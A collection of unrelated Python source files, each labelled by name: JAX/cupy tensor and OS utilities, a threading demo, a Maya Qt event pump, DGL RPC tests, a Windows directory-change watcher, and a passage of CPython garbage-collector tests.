gpu_backend = xb.get_backend("gpu")
except RuntimeError:
gpu_backend = None
buf = xc._xla.dlpack_managed_tensor_to_buffer(tensor.toDlpack(),
cpu_backend, gpu_backend)
return buf
def jax_tensor_to_cupy(tensors, take_ownership=False):
"""Convert a Jax DeviceArray to cupy tensor; zero copy."""
if isinstance(tensors, list):
return list(map(jax_tensor_to_cupy, tensors))
return cp.fromDlpack(to_dlpack(tensors, take_ownership=take_ownership))
def cupy_to_jax_tensor(tensors):
"""Convert cupy tensors to JAX tensors."""
if isinstance(tensors, list):
return list(map(cupy_to_jax_tensor, tensors))
return from_dlpack(tensors.toDlpack())
# Note: use Python jit instead of CPP jit,
# because CPP jit has bugs on _DeviceArray.
if is_worker:
FLAGS.experimental_cpp_jit = False
# Note(Hao): this function will be jit-compiled into as many versions as there are possible lengths of start_indices.
@partial(jax.jit, donate_argnums=0, static_argnums=2)
def jax_tensor_set(src_buf, update, start_indices):
"""
In-place write on a JAX buffer.
Args:
src_buf: JAX device array.
update: JAX device array.
start_indices (tuple[int]): tuple of integers indicating the starting indices.
"""
# src_buf = src_buf.at[indices].set(update)
src_buf = jax.lax.dynamic_update_slice(src_buf, update, start_indices)
return src_buf
@partial(jax.jit, static_argnums=(1, 2))
def jax_tensor_index(src_tensor, indices, size):
dst_tensor = jax.lax.dynamic_slice(src_tensor, indices, size)
return dst_tensor
########################################
##### OS / IO Utilities
########################################
def run_cmd(cmd: str):
"""Run a bash command."""
print(cmd)
ret = os.system(cmd)
return ret
def run_with_timeout(func, args=(), kwargs=None, timeout=None):
"""Run a function with timeout."""
ret_value = []
def _target_func():
ret_value.append(func(*args, **(kwargs or {})))
t = threading.Thread(target=_target_func)
t.start()
t.join(timeout=timeout)
if t.is_alive():
raise TimeoutError
if not ret_value:
raise RuntimeError
return ret_value[0]
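# Illustrative sketch (added; the helper name is hypothetical): the wrapped call
# returns its result when it finishes within the timeout, otherwise TimeoutError
# is raised.
def _example_run_with_timeout():
    assert run_with_timeout(lambda x: x + 1, args=(1,), timeout=5) == 2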
def list_gpu_info():
"""List all gpu information by calling nvidia-sim."""
ret = subprocess.getoutput("nvidia-smi -L")
visible_devices = os.environ.get("CUDA_VISIBLE_DEVICES", None)
if visible_devices:
ids = [int(x) for x in visible_devices.split(",")]
lines = ret.split("\n")
lines = [lines[i] for i in ids]
ret = "\n".join(lines)
return ret
def disable_tqdm_globally():
"""Disable tqdm globally."""
tqdm.tqdm.__init__ = partialmethod(tqdm.tqdm.__init__, disable=True)
def get_num_hosts_and_num_devices(args):
"""Get the number of hosts and the number of devices per host for benchmark scripts."""
if args.num_hosts is not None or args.num_devices_per_host is not None:
assert args.num_hosts is not None and args.num_devices_per_host is not None
num_hosts, num_devices_per_host = args.num_hosts, args.num_devices_per_host
else:
if hasattr(args, "local") and args.local:
num_hosts = 1
num_devices_per_host = list_gpu_info().count("UUID")
else:
ray.init(address="auto", namespace=get_ray_namespace_str())
num_hosts = len(ray.nodes())
num_devices_per_host = int(
ray.cluster_resources()["GPU"]) // num_hosts
return num_hosts, num_devices_per_host
def get_ray_namespace_str(prefix=global_config.default_ray_namespace_prefix):
"""Get a unique ray namespace str to avoid some annoyed warnings."""
date_str = datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
namespace_str = f"{prefix}-{date_str}"
return namespace_str
def write_tsv(heads: Sequence[str],
values: Sequence[Any],
filename: str,
print_line: bool = True):
"""Write tsv data to a file."""
assert len(heads) == len(values)
values = [str(x) for x in values]
with open(filename, "a", encoding="utf-8") as fout:
fout.write("\t".join(values) + "\n")
if print_line:
line = ""
for i in range(len(heads)):
line += heads[i] + ": " + values[i] + " "
print(line)
def to_str_round(x: Any, decimal: int = 6):
"""Print a python object but round all floating point numbers."""
if isinstance(x, str):
return x
if isinstance(x, (list, tuple, np.ndarray)):
tmp_str = ", ".join([to_str_round(y, decimal=decimal) for y in x])
return "[" + tmp_str + "]"
if isinstance(x, dict):
return str({k: to_str_round(v, decimal=decimal) for k, v in x.items()})
if isinstance(x, int):
return str(x)
if isinstance(x, float):
format_str = f"%.{decimal}f"
return format_str % x
if x is None:
return str(x)
raise ValueError("Invalid value: " + str(x))
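# Illustrative sketch (added; the helper name is hypothetical): floats are rounded
# to `decimal` places and containers are handled recursively.
def _example_to_str_round():
    assert to_str_round(3.14159, decimal=2) == "3.14"
    assert to_str_round([1, 2.5], decimal=1) == "[1, 2.5]"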
_tic = None
def print_used_time(message: str):
"""Print a message and the elapsed time from the last call."""
global _tic
if message:
print(f" - {message}: {time.time() - _tic:.2f} s")
_tic = time.time()
########################################
##### Other Utilities
########################################
GB = 1 << 30 # Gigabyte
MB = 1 << 20 # Megabyte
def map_to_shape(array_pytree: PyTreeDef):
"""Map a PyTree of jax arrays to their shapes."""
return tree_map(lambda x: getattr(x, "shape", None), array_pytree)
def compute_bytes(pytree: PyTreeDef):
"""Compute the total bytes of arrays in a pytree."""
flatten_args, _ = tree_flatten(pytree)
ret = 0
for x in flatten_args:
if hasattr(x, "shape"):
ret += np.prod(x.shape) * x.dtype.itemsize
return ret
def compute_param_number(pytree: PyTreeDef):
"""Compute the total number of elements in a pytree."""
flatten_args, _ = tree_flatten(pytree)
ret = 0
for x in flatten_args:
if hasattr(x, "shape"):
ret += np.prod(x.shape)
return ret
def get_var_mapping(mapping, var):
"""map the var to a new value if var is Var and in the mapping."""
if isinstance(var, Var) and var in mapping:
return mapping[var]
else:
return var
|
Simple.py
|
from threading import Thread, current_thread, Lock
from time import sleep
report_progress_now = []
progress_lock = Lock()
def check_report_progress(me, id):
global report_progress_now, progress_lock
if report_progress_now[id]:
progress_lock.acquire()
print("{} [{}] is making progress.".format(me.name, me.ident))
report_progress_now[id] = False
progress_lock.release()
def exception_spam(id):
me = current_thread()
while True:
try:
raise Exception()
except Exception:
pass
check_report_progress(me, id)
def sleep_forever(id):
me = current_thread()
while True:
sleep(10)
check_report_progress(me, id)
def busy_loop(id):
me = current_thread()
i = 0
while True:
i = (i % 100000000) + 1
check_report_progress(me, id)
# if i % 10000000 == 0: raise Exception()
if __name__ == '__main__':
num_threads = 10
thread_list = []
thread_fun, main_fun = exception_spam, busy_loop
for i in range(num_threads):
thread_list.append(Thread(target=thread_fun,args=(i,)))
report_progress_now.append(True)
for t in thread_list:
t.start()
report_progress_now.append(True)
me, id = current_thread(), num_threads
while True:
try:
main_fun(id)
except KeyboardInterrupt:
progress_lock.acquire()
for i, _ in enumerate(report_progress_now):
report_progress_now[i] = True
progress_lock.release()
|
pumpThread.py
|
#Creation Date: (July 16, 2007)
#Author: John Creson
import maya.cmds as cmds
import maya.utils as utils
import threading
import time
import sys
from PyQt4 import QtCore, QtGui
pumpedThread = None
app = None
def pumpQt():
global app
def processor():
app.processEvents()
while 1:
time.sleep(0.01)
utils.executeDeferred( processor )
def initializePumpThread():
global pumpedThread
global app
if pumpedThread == None:
app = QtGui.QApplication(sys.argv)
pumpedThread = threading.Thread( target = pumpQt, args = () )
pumpedThread.start()
# Copyright (C) 1997-2014 Autodesk, Inc., and/or its licensors.
# All rights reserved.
#
# The coded instructions, statements, computer programs, and/or related
# material (collectively the "Data") in these files contain unpublished
# information proprietary to Autodesk, Inc. ("Autodesk") and/or its licensors,
# which is protected by U.S. and Canadian federal copyright law and by
# international treaties.
#
# The Data is provided for use exclusively by You. You have the right to use,
# modify, and incorporate this Data into other products for purposes authorized
# by the Autodesk software license agreement, without fee.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. AUTODESK
# DOES NOT MAKE AND HEREBY DISCLAIMS ANY EXPRESS OR IMPLIED WARRANTIES
# INCLUDING, BUT NOT LIMITED TO, THE WARRANTIES OF NON-INFRINGEMENT,
# MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, OR ARISING FROM A COURSE
# OF DEALING, USAGE, OR TRADE PRACTICE. IN NO EVENT WILL AUTODESK AND/OR ITS
# LICENSORS BE LIABLE FOR ANY LOST REVENUES, DATA, OR PROFITS, OR SPECIAL,
# DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES, EVEN IF AUTODESK AND/OR ITS
# LICENSORS HAS BEEN ADVISED OF THE POSSIBILITY OR PROBABILITY OF SUCH DAMAGES.
|
test_rpc.py
|
import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address and port separated by a space, e.g., '192.168.8.12 50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
def start_server(num_clients, ip_config):
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config=ip_config,
num_clients=num_clients,
server_state=server_state)
def start_client(ip_config):
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config=ip_config)
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# clean up
time.sleep(2)
def test_serialize():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_client():
ip_config = open("rpc_ip_config_mul_client.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(10, "rpc_ip_config_mul_client.txt"))
pclient_list = []
for i in range(10):
pclient = ctx.Process(target=start_client, args=("rpc_ip_config_mul_client.txt",))
pclient_list.append(pclient)
pserver.start()
for i in range(10):
pclient_list[i].start()
for i in range(10):
pclient_list[i].join()
pserver.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
test_multi_client()
|
watchdog.py
|
# Thanks to Tim Golden for the excellent examples of win32 package
import os
import sys
import threading
import re
import win32file
import win32con
import win32api
import datetime
import configparser
class Watcher(threading.Thread):
def __init__(self, path_to_watch):
self.run = True
self.path_to_watch = path_to_watch
self.config_file = configparser.ConfigParser()
self.ACTIONS = {
1 : "Created",
2 : "Deleted",
3 : "Updated",
4 : "Renamed from something",
5 : "Renamed to something"
}
def command(self, cmd):
cmd_list = cmd.split(" ")
if cmd_list[0].lower() == 'kill':
print(f"Kill command issued for {self.path_to_watch}")
self.run = False
# TODO: DIC and separate function for each separate setting
if cmd_list[0].lower() == 'ignore':
if len(cmd_list) < 3:
print("Missing required arguments.")
return
if not cmd_list[2].isdecimal():
print("Ignore value must be 0 or 1")
return
self.setConfig(cmd_list[1], cmd_list[2])
def ignoreRegexCreator(self):
regComp = 'a^'
if int(self.config['IGNORE_BROWSER']) == 1:
browsers = {
'firefox': r"(\\Users\\.*\\AppData\\.*\\Mozilla)",
'brave': r"(\\Users\\.*\\AppData\\.*\\BraveSoftware)",
'edge': r"(\\Users\\.*\\AppData\\.*\\Microsoft\\Edge)"
}
regComp = '|'.join(browsers.values())
self.regex = re.compile(regComp, re.IGNORECASE)
def getConfig(self):
self.config_file.read('settings.ini')
if not hasattr(self, 'config'):
self.config = {}
if 'IGNORE' in self.config_file:
self.config['IGNORE_BROWSER'] = self.config_file['IGNORE'].getint('IGNORE_BROWSER', 1)
else:
self.config['IGNORE_BROWSER'] = 1
self.config_file['IGNORE'] = {}
self.config_file['IGNORE']['IGNORE_BROWSER'] = '1'
# print(f"Configs:\nIgnore Browsers:{self.config['IGNORE_BROWSER']}")
self.ignoreRegexCreator()
with open('settings.ini', 'w') as configfile:
self.config_file.write(configfile)
def setConfig(self, attr, value):
if attr == 'browser':
self.config['IGNORE_BROWSER'] = value
print(f"Browser ignore set to: {self.config['IGNORE_BROWSER']}")
self.ignoreRegexCreator()
return True
def start(self):
print(f"Starting watcher for directory: {self.path_to_watch}...")
self.getConfig()
FILE_LIST_DIRECTORY = 0x0001
hDir = win32file.CreateFile (
self.path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
while self.run:
results = win32file.ReadDirectoryChangesW(
hDir,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action, file in results:
full_filename = os.path.join(self.path_to_watch, file)
if not re.search(self.regex, full_filename):
try:
stats = os.stat(full_filename)
size = stats.st_size / (1024*1024)
except (FileNotFoundError, PermissionError):
size = 0
s = f"{datetime.datetime.now()} | {self.ACTIONS.get(action, 'Unknown')}-->{full_filename} {size:.2f}mb"
print(s)
def get_all_drives():
drives = win32api.GetLogicalDriveStrings()
drives = [d for d in drives.split('\000') if os.path.isdir(d)]
return drives
def main():
ptw = input("Enter a path ('ALL' to watch all drives; separate multiple paths with spaces):")
print(ptw.split(" "))
path_to_watch = [os.path.abspath(path) for path in ptw.split(' ')]
if ptw.lower() != 'all':
while 1:
fl = True
for path in path_to_watch:
if not os.path.isdir(path):
print(f"{path_to_watch} is not a valid directory")
path_to_watch = input("Please enter a valid directory to watch:")
if path_to_watch == 'all':
ptw = 'all'
break
path_to_watch = [os.path.abspath(path) for path in path_to_watch.split(' ')]
fl = False
if fl: break
watchers = []
if ptw.lower() == 'all':
drives = get_all_drives()
for drive in drives:
watchers.append(Watcher(drive))
else:
for path in path_to_watch:
watchers.append(Watcher(path))
functions = [watcher.start for watcher in watchers]
threads = list()
for f in functions:
x = threading.Thread(target=f)
threads.append(x)
x.start()
while 1:
try:
cmd = input("Enter action:")
if cmd == 'kill':
os._exit(1)
for watcher in watchers:
watcher.command(cmd)
except (KeyboardInterrupt, SystemExit):
sys.exit()
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
|
test_gc.py
|
import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr, cpython_only, start_threads,
temp_dir, requires_type_collecting, TESTFN, unlink,
import_module)
from test.support.script_helper import assert_python_ok, make_script
import gc
import sys
import sysconfig
import textwrap
import threading
import time
import weakref
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
if sysconfig.get_config_vars().get('PY_CFLAGS', ''):
BUILD_WITH_NDEBUG = ('-DNDEBUG' in sysconfig.get_config_vars()['PY_CFLAGS'])
else:
# Usually, sys.gettotalrefcount() is only present if Python has been
# compiled in debug mode. If it's missing, expect that Python has
# been released in release mode: with NDEBUG defined.
BUILD_WITH_NDEBUG = (not hasattr(sys, 'gettotalrefcount'))
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@requires_type_collecting
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection; make this happen.
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection; make this happen.
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
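# A minimal standalone sketch (not part of the original suite) of the situation the
# trashcan mechanism described above guards against: deallocating a very deeply
# nested container in one go.  The depth of 100000 is an arbitrary illustrative
# choice, large enough that naive recursive deallocation could exhaust the C stack.
def _trashcan_demo(depth=100000):
    x = []
    for _ in range(depth):
        x = [x]  # build a chain of singly nested lists
    del x        # dropping the last reference frees the whole chain; the trashcan
                 # bounds the recursion depth used during deallocation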
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
